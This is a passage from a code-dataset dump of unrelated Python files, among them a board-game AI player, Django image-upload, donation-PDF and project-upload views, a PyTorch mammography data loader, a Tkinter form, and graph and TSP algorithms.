insup], group))\n \n \n","sub_path":"useless/kdedb/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":7365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"536638234","text":"from PubgGame import PubgGame\nfrom HalfGoGame import HalfGoGame\nfrom backup.MinMaxSearch import MinMaxSearch\nfrom backup.ABsearch import Absearch\nfrom backup.HumanSearch import HumanSearch\n\nWHITE = 1\nBLACK = -1\nclass Player(object):\n def __init__(self, color):\n # two games\n self.pubg = PubgGame(8)\n self.halfGo = HalfGoGame(8)\n # # self.pubgPredictModule = PredictModule(\"pubgParams\")\n # # self.halfGoPredictModule = PredictModule(\"halfGoParams\")\n #\n # # common thing\n self.game = self.halfGo\n self.myColor = WHITE if color == \"white\" else BLACK\n self.turn = -1\n self.board = self.game.getInitBoard() # Objective board\n # # self.predictModule = self.halfGoPredictModule\n self.searchModule = HumanSearch(self.game, self.myColor)\n self.pubgMode = False\n\n\n\n def action(self, turns):\n \"\"\"\n Call by referee\n ti request an action\n :param turns:\n :return:\n \"\"\"\n # recalibrate the turns\n self.turn = turns\n # print(turns, self.turn)\n\n # Use our own coordinate for search, and update board\n action = self.search(self.board, turns, self.myColor)\n\n if self.myColor == BLACK and not self.pubgMode:\n action = 63 - action\n valids = self.game.getValidMoves(self.board,self.myColor)\n while(True):\n action = 0 if action == (len(valids)-1) else action\n if not valids[action]:\n action+=1\n else:\n break\n self.board, next_player = self.game.getNextState(self.board, self.myColor, action, self.turn)\n # self.game coordinate -> referee\n action_referee_form = self.game.actionGameToReferee(action)\n\n if self.turn == 23 and not self.pubgMode:\n self.game = self.pubg\n self.turn = 0\n # self.predictModule = self.pubgPredictModule\n self.searchModule = MinMaxSearch(self.game, self.myColor)\n self.pubgMode = True\n # a = input()\n return action_referee_form\n\n\n def update(self, action):\n \"\"\"\n :param action:\n Placing(x,y);\n Moving((a,b), (c,d));\n No action: None\n :return: void\n \"\"\"\n self.turn += 1\n \n action_our_form = self.game.actionRefereeToGame(action)\n\n self.board, next_player = self.game.getNextState(self.board, -1*self.myColor, action_our_form, self.turn)\n\n if self.turn == 23 and not self.pubgMode:\n self.game = self.pubg\n self.turn = 0\n # self.predictModule = self.pubgPredictModule\n self.searchModule = Absearch(self.game, self.myColor)\n self.pubgMode = True\n \n def search(self, board, turn, colour):\n return self.searchModule.search(board, turn, colour)\n \n \n","sub_path":"backup/ABplayer.py","file_name":"ABplayer.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"435220832","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\nimport random\nimport json\nimport requests\n\n# Create your views here.\ndef ai(request):\n with open(\"./json1.txt\", \"r\") as f:\n json1 = json.load(f)\n f.close()\n image_file = \"./static/\" + str(random.random() * 10) + \".jpg\"\n image_i = image_file[1:]\n if request.method == \"GET\":\n return render(request, 'index.html')\n else:\n image = request.FILES.get(\"photo\")\n if not image:\n imageUrl = request.POST.get('photoURL')\n # print(imageUrl)\n response = requests.get(imageUrl)\n image = response.content\n with open(image_file, \"wb\") as f:\n f.write(image)\n f.close()\n else:\n with open(image_file, \"wb\") as f:\n f.write(image.read())\n f.close()\n print(image_i)\n return render(request, \"index.html\", context={\"i\": image_i, \"t\": json1})\n","sub_path":"django/FaceofPeople1/ai/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"132994521","text":"import os\nimport h5py\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision.transforms import Normalize, Compose, ToTensor\nimport random\nfrom models import VGG_16\n\nclass Breast_Dataset(Dataset):\n def __init__(self, resolution=(128, 128), downsample=True):\n self.downsample = downsample\n self.resolution = resolution\n with open(\"./data.csv\", 'r') as f:\n self.filenames = [line.split()[0].split(',')[0] for line in f]\n with open(\"./data.csv\", 'r') as f:\n self.labels = [line.split()[0].split(',')[1] for line in f]\n self.transform_image = Compose([\n ToTensor(),\n Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ])\n self.transform = Compose([\n ToTensor(),\n ])\n \n def __len__(self):\n return len(self.filenames)\n \n def __getitem__(self, idx):\n filename = self.filenames[idx]\n label = self.labels[idx]\n with h5py.File(\"../\" + filename, 'r') as f:\n data = f['data'][()]\n img = data[:, :, 0]\n scaled_img = rescale_img_np(img, tmax=255.0, tmin=0.0)\n PIL_image = Image.fromarray(np.uint8(scaled_img)).convert('RGB')\n \n if self.downsample:\n image = PIL_image.resize(self.resolution) \n \n image = np.asarray(image, dtype=np.uint8) \n image = self.transform(image.copy())\n if label == 'MALIGNANT':\n label = float(1.0)\n else:\n label = float(0.0)\n \n sample = {'image': image, 'label': label}\n \n return sample\n \ndef rescale_img_np(x, mode='scale', tmax=1.0, tmin=0.0):\n if (mode == 'scale'):\n \n xmax = np.max(x)\n xmin = np.min(x)\n \n if xmin == xmax:\n return 0.5 * np.ones_like(x) * (tmax - tmin) + tmin\n x = ((x - xmin) / (xmax - xmin)) * (tmax - tmin) + tmin\n elif (mode == 'clamp'):\n x = np.clamp(x, 0, 1)\n return x\n\ndef rescale_img(x, mode='scale', tmax=1.0, tmin=0.0):\n if (mode == 'scale'):\n \n xmax = torch.max(x)\n xmin = torch.min(x)\n \n if xmin == xmax:\n return 0.5 * np.ones_like(x) * (tmax - tmin) + tmin\n x = ((x - xmin) / (xmax - xmin)) * (tmax - tmin) + tmin\n elif (mode == 'clamp'):\n x = torch.clamp(x, 0, 1)\n return x\n\nif __name__ == '__main__':\n # filename = '../data/00001/LEFT_MLO.h5'\n # with h5py.File(filename, 'r') as f:\n # data = f['data'][()]\n # img = data[:, :, 0]\n # scaled_img = rescale_img(img, tmax=255.0, tmin=0.0)\n # PIL_image = Image.fromarray(np.uint8(scaled_img)).convert('RGB')\n seed = 40\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n \n breast_dataset = Breast_Dataset()\n breast_dataset[0]\n train_dataset, val_dataset, test_dataset = torch.utils.data.random_split(breast_dataset,\n [450, 65, 130])\n train_data_loader = DataLoader(train_dataset, batch_size=64, shuffle=True)\n val_data_loader = DataLoader(val_dataset, batch_size=1, shuffle=False)\n test_data_loader = DataLoader(test_dataset, batch_size=1, shuffle=False)\n \n for i, batch in enumerate(train_data_loader):\n print(i)\n print(batch['image'].shape) # 64, 3, 128, 128\n print(batch['label'].shape) # 64, 1\n \n image_rescaled = rescale_img(batch['image'][0])\n image_rescaled = image_rescaled.numpy().transpose(1,2,0)\n plt.imshow(image_rescaled)\n \n image = batch['image']\n model = VGG_16() \n out = model(image)\n print(out.shape) \n pass\n \n \n ","sub_path":"dataio.py","file_name":"dataio.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"103114958","text":"from tkinter import *\nfrom gui.prikaz_entiteta.prikaz_prostorija import PrikazProstorija\nfrom model.dto.prenos_prostorija_dto import PretragaProstorijaDTO\nfrom tkinter.ttk import Combobox\nfrom tkinter import messagebox\nfrom model.konstante.konstante import REGEX_VREME, REGEX_DATUM\nfrom servis.prostorije.zauzeca_prostorija_servis import ZauzecaProstorijaServis\nfrom servis.oprema.oprema_servis import OpremaServis\n\n\nclass PretragaProstorija:\n\n def __init__(self, root):\n self._root = root\n self.lista_zahtevane_opreme = []\n self.napravi_frejmove()\n\n self.grupisi_vreme_od()\n self.grupisi_vreme_do()\n self.postava()\n\n def napravi_frejmove(self):\n self.frejm_za_vremena = Frame(self._root)\n self.frejm_za_vremena.place(x=0, y=0, width=450, height=250)\n\n self.drugi_frejm = Frame(self._root)\n self.drugi_frejm.place(x=0, y=250, width=200, height=500)\n\n self.treci_frejm = Frame(self._root)\n self.treci_frejm.place(x=200, y=250, width=200, height=500)\n\n self.cetvrti_frejm = Frame(self._root)\n self.cetvrti_frejm.place(x=100, y=500, width=200, height=500)\n\n def postava(self):\n v = OpremaServis().vrati_svu_opremu_u_sistemu()\n self.combo = Combobox(self.drugi_frejm, state='readonly', values=v, width=14)\n self.combo.grid(row=2, column=2, padx=20, pady=20)\n\n dugme = Button(self.drugi_frejm, text=\"DODAJ OPREMU\", command=self.print_vrednost_comba)\n dugme.grid(row=1, column=2, padx=20, pady=20)\n\n self.label = Label(self.treci_frejm, text=\"Izabrana oprema \\n za pretragu\").grid(row=0, column=0, padx=20)\n self.prikaz = Listbox(self.treci_frejm)\n\n dugme = Button(self.cetvrti_frejm, text=\"PRETRAZI\", command=self.pretraga)\n dugme.grid(row=0, column=2, padx=20, pady=20)\n\n def grupisi_vreme_od(self):\n self.grupa1 = LabelFrame(self.frejm_za_vremena, text=\"Vreme od\", padx=10, pady=20)\n self.grupa1.grid(row=2, column=1)\n\n Label(self.grupa1, text=\"Datum\").grid(row=0, column=1)\n Label(self.grupa1, text=\"Vreme\").grid(row=0, column=2)\n self.datumOd = Entry(self.grupa1)\n self.datumOd.grid(row=1, column=1, padx=20)\n self.vremeOd = Entry(self.grupa1)\n self.vremeOd.grid(row=1, column=2, padx=20)\n\n def grupisi_vreme_do(self):\n self.grupa2 = LabelFrame(self.frejm_za_vremena, text=\"Vreme do\", padx=10, pady=20)\n self.grupa2.grid(row=3, column=1)\n\n Label(self.grupa2, text=\"Datum\").grid(row=0, column=1)\n Label(self.grupa2, text=\"Vreme\").grid(row=0, column=2)\n self.datumDo = Entry(self.grupa2)\n self.datumDo.grid(row=1, column=1, padx=20)\n self.vremeDo = Entry(self.grupa2)\n self.vremeDo.grid(row=1, column=2, padx=20)\n\n def provera_unosa_vremena(self):\n if not REGEX_VREME.match(self.vremeOd.get()):\n messagebox.showerror(\"GRESKA\", \"Neispravan unos vremena.Oblik unos treba biti ss:mm\")\n return False\n if not REGEX_VREME.match(self.vremeDo.get()):\n messagebox.showerror(\"GRESKA\", \"Neispravan unos vremena.Oblik unos treba biti ss:mm\")\n return False\n if not REGEX_DATUM.match(self.datumOd.get()):\n messagebox.showerror(\"GRESKA\", \"Neispravan unos datuma.Oblik unosa treba biti dd/mm/gggg\")\n return False\n if not REGEX_DATUM.match(self.datumDo.get()):\n messagebox.showerror(\"GRESKA\", \"Neispravan unos datuma.Obrlk unosa treba biti dd/mm/gggg\")\n return False\n return True\n\n def pretraga(self):\n if self.provera_unosa_vremena():\n paket_za_prenos = PretragaProstorijaDTO(self.lista_zahtevane_opreme, self.datumOd.get(), self.vremeOd.get(),\n self.datumDo.get(), self.vremeDo.get(), True)\n lista = ZauzecaProstorijaServis().zauzece_prostorije_od_do(paket_za_prenos)\n novi_root = Tk()\n PrikazProstorija(novi_root, lista)\n\n def print_vrednost_comba(self):\n vrednost = self.combo.get()\n\n if vrednost == \"\":\n messagebox.showinfo(\"Prazno\", \"Izaberite opremu.\")\n else:\n if vrednost not in self.lista_zahtevane_opreme:\n self.lista_zahtevane_opreme.append(vrednost)\n self.prikaz.insert(1, vrednost)\n self.prikaz.grid(row=1, column=0, padx=2)\n else:\n messagebox.showinfo(\"Unos\", \"Parametar koji ste uneli vec je dodat u listu zahtevanih\")\n\n\ndef poziv_forma_za_pretragu_prostorija(root):\n a = PretragaProstorija(root)\n root.mainloop()\n\n\nif __name__ == '__main__':\n root = Tk()\n root.geometry(\"600x570\")\n poziv_forma_za_pretragu_prostorija(root)\n","sub_path":"gui/upravnik/pretraga_prostorija.py","file_name":"pretraga_prostorija.py","file_ext":"py","file_size_in_byte":4770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"81888436","text":"import sys, collections\nsys.setrecursionlimit(10**6)\n\ndef make_graph(n, p):\n g = collections.defaultdict(int)\n for i in range(1, n+1):\n g[i] = p[i-1]\n return g \n\ndef dfs(u):\n global g\n global visited\n\n visited[u] = 1\n\n if not visited[g[u]]:\n dfs(g[u])\n\nt = int(sys.stdin.readline().strip())\n\nfor _ in range(t):\n n = int(sys.stdin.readline().strip())\n p = [int(x) for x in sys.stdin.readline().split()]\n cnt = 0\n\n g = make_graph(n, p)\n visited = [0 for _ in range(n+1)]\n\n for i in range(1, n+1):\n if not visited[i]:\n dfs(i)\n cnt += 1\n \n print(cnt)\n","sub_path":"Baekjoon/Graph/BFS&DFS/10451(순열 사이클).py","file_name":"10451(순열 사이클).py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"145563234","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom .models import *\nfrom .forms import *\nfrom django.core.exceptions import ObjectDoesNotExist\n\nimport datetime\n\nfrom django.views.generic import View\nfrom django.template.loader import get_template\nfrom Social_Vision_Web.utils import render_to_pdf\n\nimport os\nfrom django.conf import settings\nfrom xhtml2pdf import pisa\nfrom django.contrib.staticfiles import finders\n\nfrom .decorators import *\nfrom django.contrib.auth.models import Group\n\ndef link_callback(uri, rel):\n result = finders.find(uri)\n if result:\n if not isinstance(result, (list, tuple)):\n result = [result]\n result = list(os.path.realpath(path) for path in result)\n path = result[0]\n else:\n sUrl = settings.STATIC_URL # Typically /static/\n sRoot = settings.STATIC_ROOT # Typically /home/userX/project_static/\n mUrl = settings.MEDIA_URL # Typically /media/\n mRoot = settings.MEDIA_ROOT # Typically /home/userX/project_static/media/\n\n if uri.startswith(mUrl):\n path = os.path.join(mRoot, uri.replace(mUrl, \"\"))\n elif uri.startswith(sUrl):\n path = os.path.join(sRoot, uri.replace(sUrl, \"\"))\n else:\n return uri\n\n # make sure that file exists\n if not os.path.isfile(path):\n raise Exception(\n 'media URI must start with %s or %s' % (sUrl, mUrl)\n )\n return path\n\n\n@authenticated_user\ndef donateView(request):\n user = request.user\n try:\n donations = user.donation_set.all()\n context = {\n 'user':user,\n 'donations':donations,\n }\n except ObjectDoesNotExist as o:\n context = {\n 'user':user,\n }\n\n\n return render(request, 'changemaker/donateUser.html', context)\n\n\n@authenticated_user\ndef donateForm(request):\n user = request.user\n form = DonationForm(initial={'user': request.user})\n\n if request.method == 'POST':\n form = DonationForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n uniqueID = Donation.objects.latest('dateCreated').uniqueID\n return redirect('/change-maker/pay/' + str(uniqueID) + '/')\n\n context = {\n 'form': form,\n }\n\n return render(request, 'changemaker/donateForm.html', context)\n\n@authenticated_user\ndef donatePay(request, id):\n donation = Donation.objects.get(uniqueID=id).amount\n uniqueID = Donation.objects.get(uniqueID=id).uniqueID\n\n context = {\n 'donation':donation,\n 'id':uniqueID,\n }\n\n return render(request, 'changemaker/donatePay.html',context)\n\n@authenticated_user\ndef donateSuccess(request, id):\n donation = Donation.objects.get(uniqueID=id)\n donation.status = \"Completed\"\n donation.save()\n context = {\n\n }\n\n return redirect('/change-maker/view/')\n\n@authenticated_user\ndef printDonationCertif(request, id):\n user = request.user\n dn = Donation.objects.get(uniqueID=id)\n\n context = {\n 'dn': dn,\n 'user':user,\n }\n\n # return render(request, 'changemaker/donateCertif.html', context)\n\n template_path = 'changemaker/donateCertif.html'\n response = HttpResponse(content_type='application/pdf')\n response['Content-Disposition'] = 'filename=\"Donation-Certificate.pdf'\n template = get_template(template_path)\n html = template.render(context)\n pisa_status = pisa.CreatePDF(\n html, dest=response, link_callback=link_callback)\n if pisa_status.err:\n return HttpResponse('We had some errors
' + html + '
')\n return response\n\n@authenticated_user\ndef printDonationReceipt(request, id):\n user = request.user\n dn = Donation.objects.get(uniqueID=id)\n\n context = {\n 'dn': dn,\n 'user':user,\n }\n\n template_path = 'changemaker/donateReceipt.html'\n response = HttpResponse(content_type='application/pdf')\n response['Content-Disposition'] = 'filename=\"Donation-Receipt.pdf'\n template = get_template(template_path)\n html = template.render(context)\n pisa_status = pisa.CreatePDF(\n html, dest=response, link_callback=link_callback)\n if pisa_status.err:\n return HttpResponse('We had some errors
' + html + '
')\n return response\n","sub_path":"changemaker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"500858416","text":"#ashwin\nn,q=map(int,input().split())\nprint(\"Prime numbers between\",n,\"and\",q,\"are:\")\nfor num in range(n,q + 1):\n if num > 1:\n for i in range(2,num):\n if (num % i) == 0:\n break\n else:\n print(num)\n","sub_path":"prime_range.py","file_name":"prime_range.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"232658869","text":"import csv\nimport os\nfrom outputBuilder import OutputBuilder\n\n\ndef main():\n output = OutputBuilder()\n cur_path = os.path.dirname(__file__)\n input_path = os.path.relpath(\"../inputs/input.csv\", cur_path)\n\n try:\n # Assuming \"input.csv\" is simulating a real-time buffer\n stream = open(input_path, \"r\", newline=\"\") \n ireader = csv.reader(stream)\n while True:\n try:\n line = next(ireader)\n output.process_line(line)\n except StopIteration:\n print(\"task completed\")\n break\n except:\n print(\"input file error\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"559631004","text":"from pyretic.lib.corelib import *\nfrom pyretic.lib.std import *\nfrom pyretic.lib.query import *\n\nclass VlanFilter(DynamicPolicy):\n def __init__(self, vlans, ports):\n super(VlanFilter, self).__init__()\n self.vlans = vlans\n self.ports = ports\n self.update_filter()\n\n def update_filter(self):\n self.filter_policy = drop\n for key in self.ports.keys():\n switch = int(key.split('-')[0])\n port = int(key.split('-')[1])\n vid = self.ports[key]\n self.filter_policy = self.filter_policy + match(switch=switch, outport=port, vlan_id=vid)\n self.policy = if_(egress_network(), self.filter_policy >> modify(vlan_id=None), identity)\n","sub_path":"controller/app/vlan_filter.py","file_name":"vlan_filter.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"209041445","text":"# William McLaughlin\r\n# Evan LeValley\r\n\r\n\r\nclass Graph:\r\n\r\n def __init__(self, vertices):\r\n self.V = vertices\r\n self.graph = []\r\n\r\n def addEdge(self, u, v, w):\r\n self.graph.append([u, v, w])\r\n\r\n def find(self, parent, i):\r\n if parent[i] == i:\r\n return i\r\n return self.find(parent, parent[i])\r\n\r\n def union(self, parent, rank, x, y):\r\n xroot = self.find(parent, x)\r\n yroot = self.find(parent, y)\r\n\r\n if rank[xroot] < rank[yroot]:\r\n parent[xroot] = yroot\r\n elif rank[xroot] > rank[yroot]:\r\n parent[yroot] = xroot\r\n\r\n else:\r\n parent[yroot] = xroot\r\n rank[xroot] += 1\r\n\r\n def KruskalMST(self):\r\n result = []\r\n i = 0\r\n e = 0\r\n\r\n self.graph = sorted(self.graph, key=lambda item: item[2])\r\n\r\n parent = []\r\n rank = []\r\n\r\n for node in range(self.V):\r\n parent.append(node)\r\n rank.append(0)\r\n\r\n while e < self.V - 1:\r\n\r\n u, v, w = self.graph[i]\r\n i = i + 1\r\n x = self.find(parent, u)\r\n y = self.find(parent, v)\r\n\r\n if x != y:\r\n e = e + 1\r\n result.append([u, v, w])\r\n self.union(parent, rank, x, y)\r\n\r\n edge = []\r\n for u, v, weight in result:\r\n\r\n newList = [u, v,weight]\r\n edge.append(newList)\r\n newList = [v, u, weight]\r\n edge.append(newList)\r\n\r\n return find_eulerian_tour(edge)\r\n\r\n\r\ndef next_node(edge, current):\r\n return edge[0] if current == edge[1] else edge[1]\r\n\r\n\r\ndef remove_edge(raw_list, discard):\r\n return [item for item in raw_list if item != discard]\r\n\r\n\r\ndef find_eulerian_tour(graph):\r\n search = [[[], graph[0][0], graph]]\r\n while search:\r\n path, node, unexplore = search.pop()\r\n path += [node]\r\n\r\n if not unexplore:\r\n return path\r\n\r\n for edge in unexplore:\r\n if node in edge:\r\n search += [[path, next_node(edge, node), remove_edge(unexplore, edge)]]\r\n\r\n\r\ndef trimPath(eucPath):\r\n unique = []\r\n\r\n for i in eucPath:\r\n if i not in unique:\r\n unique.append(i)\r\n\r\n unique.append(unique[0])\r\n return unique\r\n\r\n\r\ndef getWeight(eucPath, matrix):\r\n sum = 0\r\n for i in range(len(eucPath)-2):\r\n j = eucPath[i]\r\n k = eucPath[i+1]\r\n sum += matrix[j][k]\r\n return sum\r\n\r\n\r\ndef main():\r\n matrix = [[]]\r\n count = 0\r\n\r\n with open('in.txt', 'r') as f:\r\n for line in f:\r\n matrix.append([])\r\n for word in line.split():\r\n string = word.strip()\r\n integer = int(string, 10)\r\n matrix[count].append(integer)\r\n count += 1\r\n\r\n g = Graph(len(matrix)-1)\r\n for i in range(len(matrix)-1):\r\n for j in range(len(matrix)-1):\r\n g.addEdge(i, j, matrix[i][j])\r\n\r\n\r\n eucPath = g.KruskalMST()\r\n eucPath = trimPath(eucPath)\r\n weight = getWeight(eucPath, matrix)\r\n print(\"sum: \", weight)\r\n\r\n for u in eucPath:\r\n # if u == 0:\r\n # u = 'Aa'\r\n # if u == 1:\r\n # u = 'Ba'\r\n # if u == 2:\r\n # u = 'Be'\r\n # if u == 3:\r\n # u = 'Du'\r\n # if u == 4:\r\n # u = 'Fr'\r\n # if u == 5:\r\n # u = 'Ha'\r\n # if u == 6:\r\n # u = 'Mu'\r\n # if u == 7:\r\n # u = 'Nu'\r\n # if u == 8:\r\n # u = 'St'\r\n print(u, end=' -- ')\r\n\r\n\r\nmain()\r\n","sub_path":"TSP.py","file_name":"TSP.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"269385199","text":"\"\"\"\nCopyright (c) 2014-2016 Ehsan Iran-Nejad\nPython scripts for Autodesk Revit\n\nThis file is part of pyRevit repository at https://github.com/eirannejad/pyRevit\n\npyRevit is a free set of scripts for Autodesk Revit: you can redistribute it and/or modify\nit under the terms of the GNU General Public License version 3, as published by\nthe Free Software Foundation.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nSee this link for a copy of the GNU General Public License protecting this package.\nhttps://github.com/eirannejad/pyRevit/blob/master/LICENSE\n\"\"\"\n\n__doc__ = 'Merges the selected text note elements into one.'\n\n__window__.Close()\nfrom Autodesk.Revit.DB import Transaction\n\ndoc = __revit__.ActiveUIDocument.Document\nuidoc = __revit__.ActiveUIDocument\n\nt = Transaction(doc, 'Merge Single-Line Text')\nt.Start()\n\nselection = [doc.GetElement(elId) for elId in __revit__.ActiveUIDocument.Selection.GetElementIds()]\ntnotes = sorted(selection, key=lambda txnote: 0 - txnote.Coord.Y)\n\nmtxt = tnotes[0]\nmtxtwidth = mtxt.Width\nfor txt in tnotes[1:]:\n if txt.Text[0] == ' ':\n mtxt.Text = mtxt.Text + txt.Text\n else:\n mtxt.Text = mtxt.Text + ' ' + txt.Text\n doc.Delete(txt.Id)\n\nmtxt.Width = mtxtwidth\nt.Commit()\n","sub_path":"Text_mergeTextNotes.py","file_name":"Text_mergeTextNotes.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"328111104","text":"from copy import deepcopy\nimport re\nimport sys\nfrom django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.conf import settings\nfrom django.db.models import Q\nfrom django.http import JsonResponse, HttpResponseNotFound\nfrom django.conf import settings\nfrom django.db import connection\nfrom django.core.urlresolvers import reverse\nfrom data_upload.models import UserUpload, UserUploadedFile\nfrom projects.models import User_Feature_Definitions, User_Feature_Counts, Project\nfrom sharing.service import create_share\nfrom google.appengine.api.mail import send_mail\n\nimport json\nimport requests\n\n@login_required\ndef public_project_list(request):\n return project_list(request, is_public=True)\n\n@login_required\ndef project_list(request, is_public=False):\n template = 'projects/project_list.html'\n\n ownedProjects = request.user.project_set.all().filter(active=True)\n sharedProjects = Project.objects.filter(shared__matched_user=request.user, shared__active=True, active=True)\n\n projects = ownedProjects | sharedProjects\n projects = projects.distinct()\n\n context = {\n 'projects': projects,\n 'public_projects': Project.objects.all().filter(is_public=True,active=True),\n 'is_public': is_public\n }\n return render(request, template, context)\n\n@login_required\ndef project_detail(request, project_id=0):\n # \"\"\" if debug: print >> sys.stderr,'Called '+sys._getframe().f_code.co_name \"\"\"\n template = 'projects/project_detail.html'\n\n ownedProjects = request.user.project_set.all().filter(active=True)\n sharedProjects = Project.objects.filter(shared__matched_user=request.user, shared__active=True, active=True)\n publicProjects = Project.objects.all().filter(is_public=True,active=True)\n\n projects = ownedProjects | sharedProjects | publicProjects\n projects = projects.distinct()\n\n proj = projects.get(id=project_id)\n\n shared = None\n if proj.owner.id != request.user.id and not proj.is_public:\n shared = request.user.shared_resource_set.get(project__id=project_id)\n\n proj.mark_viewed(request)\n context = {\n 'project': proj,\n 'studies': proj.study_set.all().filter(active=True),\n 'shared': shared\n }\n return render(request, template, context)\n\n@login_required\ndef request_project(request):\n send_mail(\n 'request@' + settings.PROJECT_NAME + '.appspotmail.com',\n settings.REQUEST_PROJECT_EMAIL,\n 'User has requested a Google Project',\n '''\nThe user %s has requested a new Google Project be created. Here is their message:\n\n%s\n ''' % (request.user.email, request.POST['message']))\n\n template = 'projects/project_request.html'\n context = {\n 'requested': True\n }\n return render(request, template, context)\n\n@login_required\ndef project_upload(request):\n if not hasattr(request.user, 'googleproject'):\n template = 'projects/project_request.html'\n else:\n template = 'projects/project_upload.html'\n\n projects = request.user.project_set.all().filter(active=True)\n\n context = {\n 'requested': False,\n 'projects': projects,\n }\n return render(request, template, context)\n\ndef filter_column_name(original):\n return re.sub(r\"[^a-zA-Z0-9]+\", \"_\", original.lower())\n\ndef create_metadata_tables(user, study, columns, skipSamples=False):\n with connection.cursor() as cursor:\n cursor.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS user_metadata_%s_%s (\n id INTEGER UNSIGNED AUTO_INCREMENT PRIMARY KEY,\n study_id INTEGER UNSIGNED,\n sample_barcode VARCHAR(200),\n file_path VARCHAR(200),\n file_name VARCHAR(200),\n data_type VARCHAR(200),\n pipeline VARCHAR(200),\n platform VARCHAR(200)\n )\n \"\"\", [user.id, study.id])\n\n if not skipSamples:\n feature_table_sql = \"\"\"\n CREATE TABLE IF NOT EXISTS user_metadata_samples_%s_%s (\n id INTEGER UNSIGNED AUTO_INCREMENT PRIMARY KEY,\n participant_barcode VARCHAR(200),\n sample_barcode VARCHAR(200) UNIQUE,\n has_mrna BOOLEAN,\n has_mirna BOOLEAN,\n has_protein BOOLEAN,\n has_meth BOOLEAN\n \"\"\"\n feature_table_args = [user.id, study.id]\n\n for column in columns:\n feature_table_sql += \", \" + filter_column_name(column['name']) + \" \" + column['type']\n\n feature_table_sql += \")\"\n cursor.execute(feature_table_sql, feature_table_args)\n\n@login_required\ndef upload_files(request):\n status = 'success'\n message = None\n proj = None\n study = None\n\n # TODO: Validation\n\n if request.POST['project-type'] == 'new':\n proj = request.user.project_set.create(name=request.POST['project-name'], description=request.POST['project-description'])\n proj.save()\n else:\n proj = request.user.project_set.all().filter(id=request.POST['project-id'])[0]\n\n if proj is None:\n status = 'error'\n message = 'Unable to create project'\n else:\n study = proj.study_set.create(\n name=request.POST['study-name'],\n description=request.POST['study-description'],\n owner=request.user\n )\n\n if request.POST['data-type'] == 'extend':\n # TODO Does this need a share check??\n study.extends_id = request.POST['extend-study-id']\n\n study.save()\n\n upload = UserUpload(owner=request.user)\n upload.save()\n\n config = {\n \"USER_PROJECT\": proj.id,\n \"USER_ID\": request.user.id,\n \"STUDY\": study.id,\n \"BUCKET\": request.user.bucket_set.all()[0].bucket_name,\n \"GOOGLE_PROJECT\": request.user.googleproject.project_name,\n \"BIGQUERY_DATASET\": request.user.googleproject.big_query_dataset,\n \"FILES\": [],\n \"USER_METADATA_TABLES\": {\n \"METADATA_DATA\" : \"user_metadata_\" + str(request.user.id) + \"_\" + str(study.id),\n \"METADATA_SAMPLES\" : \"user_metadata_samples_\" + str(request.user.id) + \"_\" + str(study.id),\n \"FEATURE_DEFS\": User_Feature_Definitions._meta.db_table\n }\n }\n all_columns = []\n\n for formfield in request.FILES:\n file = request.FILES[formfield]\n file_upload = UserUploadedFile(upload=upload, file=file, bucket=config['BUCKET'])\n try :\n file_upload.save()\n except Exception :\n study.delete()\n proj.delete()\n upload.delete()\n\n resp = {\n 'status': \"error\",\n 'error' : \"bad_file\",\n 'message': \"There is a problem with the format of your file. Check for empty lines at the end of your file\"\n }\n return JsonResponse(resp)\n\n descriptor = json.loads(request.POST[formfield + '_desc'])\n datatype = request.POST[formfield + '_type']\n fileJSON = {\n \"FILENAME\": file_upload.file.name,\n \"PLATFORM\": descriptor['platform'],\n \"PIPELINE\": descriptor['pipeline'],\n \"BIGQUERY_TABLE_NAME\": \"cgc_\" + (\"user\" if datatype == 'user_gen' else datatype) +\n \"_\" + str(proj.id) + \"_\" + str(study.id),\n \"DATATYPE\": datatype,\n \"COLUMNS\": []\n }\n\n if datatype == \"user_gen\":\n for column in descriptor['columns']:\n if column['ignored']:\n continue\n\n type = column['type']\n if type == 'string' or type == 'url' or type == 'file':\n type = 'VARCHAR(200)'\n else:\n type = filter_column_name(type)\n\n controlled = None\n shared_id = None\n if 